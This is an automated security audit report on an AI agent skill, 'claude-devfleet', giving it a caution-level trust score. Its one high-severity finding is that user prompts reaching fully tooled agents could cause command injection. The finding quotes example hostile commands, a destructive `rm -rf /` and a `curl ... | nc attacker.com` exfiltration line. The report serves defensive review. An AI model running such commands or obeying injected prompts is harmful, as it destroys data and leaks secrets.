Security Audit
Jamkris/everything-gemini-code:skills/claude-devfleet
github.com/Jamkris/everything-gemini-codeTrust Assessment
Jamkris/everything-gemini-code:skills/claude-devfleet received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 1 finding: 0 critical, 1 high, 0 medium, and 0 low severity. Key findings include Agent 'full tooling' enables command injection and data exfiltration via user prompts.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on March 30, 2026 (commit 6c6f43aa). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings1
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Agent 'full tooling' enables command injection and data exfiltration via user prompts The skill description explicitly states that 'Each agent runs in an isolated git worktree with full tooling.' The `plan_project` and `create_mission` tools accept user-provided prompts, which are then interpreted by an AI agent within the DevFleet system. This 'full tooling' capability, combined with user-controlled prompts, creates a credible exploit path for command injection and data exfiltration. If the underlying DevFleet agents are not rigorously sandboxed, a malicious user prompt could instruct an agent to execute arbitrary commands (e.g., `rm -rf /`, `curl sensitive_data | nc attacker.com`) or exfiltrate data from the agent's environment or even the host system if the isolation is weak. The skill acts as a conduit for these potentially malicious instructions to the powerful agents. Ensure the `claude-devfleet` instance and its agents are running in a highly secure, strictly sandboxed environment with minimal necessary permissions. Implement robust input validation and sanitization for prompts passed to `plan_project` and `create_mission` to prevent malicious instructions from reaching the agents. Consider restricting the 'full tooling' capabilities or providing a more granular set of tools to the agents. | LLM | SKILL.md:17 |
Scan History
Embed Code
[](https://skillshield.io/report/db5977f47a1b59f2)
Powered by SkillShield